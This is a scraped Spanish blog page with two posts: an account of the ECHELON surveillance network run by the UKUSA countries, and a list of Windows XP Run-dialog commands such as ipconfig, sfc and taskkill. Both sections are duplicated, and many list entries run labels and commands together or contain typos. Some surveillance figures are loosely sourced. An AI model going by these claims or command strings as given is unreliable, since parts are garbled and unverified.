Según algunas fuentes el sistema dispone de 120 estaciones fijas y satélites geoestacionarios. Estos podrían filtrar más del 90% del tráfico de internet. Las antenas de Echelon pueden captar ondas electromagnéticas y trasmitirlas a un lugar central para su procesamiento. Se recogen los mensajes aleatoriamente y se procesan mediante los diversos filtros buscando palabras clave. Este procedimiento se denomina "Control estratégico de las telecomunicaciones".
En 2001, el Parlamento Europeo constató la existencia de "un sistema de interceptación mundial de las comunicaciones, resultado de una cooperación entre los Estados Unidos, el Reino Unido, Canadá, Australia y Nueva Zelanda".
A pesar de haber sido presuntamente construida con el fin de controlar las comunicaciones militares y diplomáticas de la Unión Soviética y sus aliados, se sospecha que en la actualidad ECHELON es utilizado también para encontrar pistas sobre tramas terroristas, planes del narcotráfico e inteligencia política y diplomática. Sus críticos afirman que el sistema es utilizado también para el espionaje económico y la invasión de privacidad en gran escala.
Los miembros de esta alianza de habla inglesa son parte de la alianza de inteligencia UKUSA, que lleva reuniendo inteligencia desde la Segunda Guerra Mundial. La existencia de ECHELON fue hecha pública en 1976 por Winslow Peck.
Varias fuentes afirman que estos estados han ubicado estaciones de intercepción electrónica y satélites espaciales para capturar gran parte de las comunicaciones establecidas por radio, satélite, microondas, celulares y fibra óptica. Las señales capturadas son luego procesadas por una serie de supercomputadoras, conocidas como diccionarios, las cuales han sido programadas para buscar patrones específicos en cada comunicación, ya sean direcciones, palabras, frases o incluso voces específicas.
El sistema está bajo la administración de la NSA (National Security Agency). Esta organización cuenta con 100.000 empleados tan sólo en Maryland (Estados Unidos) (otras fuentes hablan de 38.000 empleados a escala mundial), por lo que es probablemente la mayor organización de espionaje del mundo.
A cada estado dentro de la alianza UKUSA le es asignado una responsabilidad sobre el control de distintas áreas del planeta. La tarea principal de Canadá solía ser el control del área meridional de la antigua Unión Soviética. Durante el período de la guerra fría se puso mayor énfasis en el control de comunicaciones por satélite y radio en centro y Sudamérica, principalmente como medida para localizar tráfico de drogas y secuaces en la región. Los Estados Unidos, con su gran cadena de satélites espías y puertos de escucha controlan gran parte de Latinoamérica, Asia, Rusia asiática y el norte de China. Gran Bretaña intercepta comunicaciones en Europa, Rusia y África. Australia examina las comunicaciones de Indochina, Indonesia y el sur de China, mientras que Nueva Zelanda barre el Pacífico occidental.
Según algunas fuentes el sistema dispone de 120 estaciones fijas y satélites geoestacionarios. Estos podrían filtrar más del 90% del tráfico de internet. Las antenas de Echelon pueden captar ondas electromagnéticas y trasmitirlas a un lugar central para su procesamiento. Se recogen los mensajes aleatoriamente y se procesan mediante los diversos filtros buscando palabras clave. Este procedimiento se denomina "Control estratégico de las telecomunicaciones".
En 2001, el Parlamento Europeo constató la existencia de "un sistema de interceptación mundial de las comunicaciones, resultado de una cooperación entre los Estados Unidos, el Reino Unido, Canadá, Australia y Nueva Zelanda".
Comandos inicio\ejecutar
Hay muchos mas .. pero por el momento .....
Administración de equiposcompmgmt.msc
Administrador de tareastaskmgr
pande de contorlcontrol
Administrativas, Herramientascontrol admintools
Añadir hardware, asistentehdwwiz.cpl
Añadir/desinstalar programasappwiz.cpl
Búsqueda rápidafindfast.cpl
eudcedit
Carpeta, opcionescontrol folders
Certificados (gestión)certmgr.msc
Caracteres (Mapa)charmap
Carpetas compartidasfsmgmt.msc
lipboard Viewer (Para visualizar el portapapeles)clipbrd
dcomcnfg
gpedit.mscprinters
Internet, propiedadesinetcpl.cpl
IP Configuración (Muestra la configuración de las conexiones)ipconfig /all
IP Configuración (Muestra la caché de resolución de DNS - recomendable mirar todo lo que hay)ipconfig /displaydns
IP Configuración (Borra las DNS Cache Contents)ipconfig /flushdns
IP Configuración (Lanza todas las conexiones)ipconfig /release
IP Configuración (Renueva todas las conexiones)ipconfig /renew
IP Configuración (Refresca DHCP & Re-Registra DNS)ipconfig /registerdns
IP Configuración (Muestra DHCP Class ID)ipconfig /showclassid
IP Configuración (Modifica DHCP Class ID)ipconfig /setclassid
Java, Panel de control (Si está instalado)jpicpl32.cpl (también: javaws)
Juego: buscaminaswinmine
Juego: carta blancafreecell
Juego: corazonesmshearts
Juego: solitariosol
Juego: spiderspider
Juegos, controladoresjoy.cpl
Medios de almacenamiento extraíblesntmsmgr.msc
Ratón, propiedadescontrol mouse (también: main.cpl)
Red, conexionescontrol netconnections (también: ncpa.cpl)
Red, asistente de configuraciónnetsetup.cpl
Teclado en pantalla (útil si se te estropea el teclado)osk
Pantalla, propiedadescontrol desktop (también: desk.cpl)Si se quiere que aparezca la pestaña de control de colores: control color
Password, propiedadespassword.cpl
Rendimiento del sistema, monitorperfmon.msc (también: perfmon)
Resultant Set of Policy (XP Profesional)rsop.msc
Salir de Windows (para cambiar de usuario)logoff
Security Centerwscui.cpl
Seguridad, configuración localsecpol.msc
Serviciosservices.msc
Sistema, editor de configuraciónsysedit
Sistema, propiedadessysdm.cpl
Sistema, utilidad de comprobación de archivos (Escanea inmediatamente)sfc /scannow
Sistema, utilidad de comprobación de archivos (Escanea una vez en el siguiente encendido)sfc /scanonce
Sistema, utilidad de comprobación de archivos (Escanea en cada encendido)sfc /scanboot
Sistema, utilidad de comprobación de archivos (Vuelve a la configuración por defecto)sfc /revert
Sistema, utilidad de comprobación de archivos (Purga el archivo caché)sfc /purgecache
Sistema, utilidad de comprobación de archivos (Configura el archivo caché a la talla x)sfc /cachesize=x
SQL, configuracióncliconfg
Sucesos, visoreventvwr.msc
Tareas, lista (XP profesional)tasklist
Tareas, terminar (XP profesional)taskkill /PID
Tareas programadascontrol schedtasks
Teclado, propiedadescontrol keyboard
Teléfono y Modem, opcionestelephon.cpl
Telnet, clientetelnet
Usuario, administrador de cuentanusrmgr.cpl
Usuarios, administrador de cuentascontrol userpasswords2
Usuarios, cuentascontrol userpasswords
Usuarios locales y gruposlusrmgr.msc
Utilidades, administradorutilman
Windows Firewallfirewall.cpl
Windows Management Infrastructurewmimgmt.msc
Windows System Security Toolsyskey
Windows Updatewupdmgr
Windows XP, paseo portourstart
Wordpadwrite
Administración de equiposcompmgmt.msc
Administrador de tareastaskmgr
pande de contorlcontrol
Administrativas, Herramientascontrol admintools
Añadir hardware, asistentehdwwiz.cpl
Añadir/desinstalar programasappwiz.cpl
Búsqueda rápidafindfast.cpl
eudcedit
Carpeta, opcionescontrol folders
Certificados (gestión)certmgr.msc
Caracteres (Mapa)charmap
Carpetas compartidasfsmgmt.msc
lipboard Viewer (Para visualizar el portapapeles)clipbrd
dcomcnfg
gpedit.mscprinters
Internet, propiedadesinetcpl.cpl
IP Configuración (Muestra la configuración de las conexiones)ipconfig /all
IP Configuración (Muestra la caché de resolución de DNS - recomendable mirar todo lo que hay)ipconfig /displaydns
IP Configuración (Borra las DNS Cache Contents)ipconfig /flushdns
IP Configuración (Lanza todas las conexiones)ipconfig /release
IP Configuración (Renueva todas las conexiones)ipconfig /renew
IP Configuración (Refresca DHCP & Re-Registra DNS)ipconfig /registerdns
IP Configuración (Muestra DHCP Class ID)ipconfig /showclassid
IP Configuración (Modifica DHCP Class ID)ipconfig /setclassid
Java, Panel de control (Si está instalado)jpicpl32.cpl (también: javaws)
Juego: buscaminaswinmine
Juego: carta blancafreecell
Juego: corazonesmshearts
Juego: solitariosol
Juego: spiderspider
Juegos, controladoresjoy.cpl
Medios de almacenamiento extraíblesntmsmgr.msc
Ratón, propiedadescontrol mouse (también: main.cpl)
Red, conexionescontrol netconnections (también: ncpa.cpl)
Red, asistente de configuraciónnetsetup.cpl
Teclado en pantalla (útil si se te estropea el teclado)osk
Pantalla, propiedadescontrol desktop (también: desk.cpl)Si se quiere que aparezca la pestaña de control de colores: control color
Password, propiedadespassword.cpl
Rendimiento del sistema, monitorperfmon.msc (también: perfmon)
Resultant Set of Policy (XP Profesional)rsop.msc
Salir de Windows (para cambiar de usuario)logoff
Security Centerwscui.cpl
Seguridad, configuración localsecpol.msc
Serviciosservices.msc
Sistema, editor de configuraciónsysedit
Sistema, propiedadessysdm.cpl
Sistema, utilidad de comprobación de archivos (Escanea inmediatamente)sfc /scannow
Sistema, utilidad de comprobación de archivos (Escanea una vez en el siguiente encendido)sfc /scanonce
Sistema, utilidad de comprobación de archivos (Escanea en cada encendido)sfc /scanboot
Sistema, utilidad de comprobación de archivos (Vuelve a la configuración por defecto)sfc /revert
Sistema, utilidad de comprobación de archivos (Purga el archivo caché)sfc /purgecache
Sistema, utilidad de comprobación de archivos (Configura el archivo caché a la talla x)sfc /cachesize=x
SQL, configuracióncliconfg
Sucesos, visoreventvwr.msc
Tareas, lista (XP profesional)tasklist
Tareas, terminar (XP profesional)taskkill /PID
Tareas programadascontrol schedtasks
Teclado, propiedadescontrol keyboard
Teléfono y Modem, opcionestelephon.cpl
Telnet, clientetelnet
Usuario, administrador de cuentanusrmgr.cpl
Usuarios, administrador de cuentascontrol userpasswords2
Usuarios, cuentascontrol userpasswords
Usuarios locales y gruposlusrmgr.msc
Utilidades, administradorutilman
Windows Firewallfirewall.cpl
Windows Management Infrastructurewmimgmt.msc
Windows System Security Toolsyskey
Windows Updatewupdmgr
Windows XP, paseo portourstart
Wordpadwrite
Suscribirse a:
Entradas (Atom)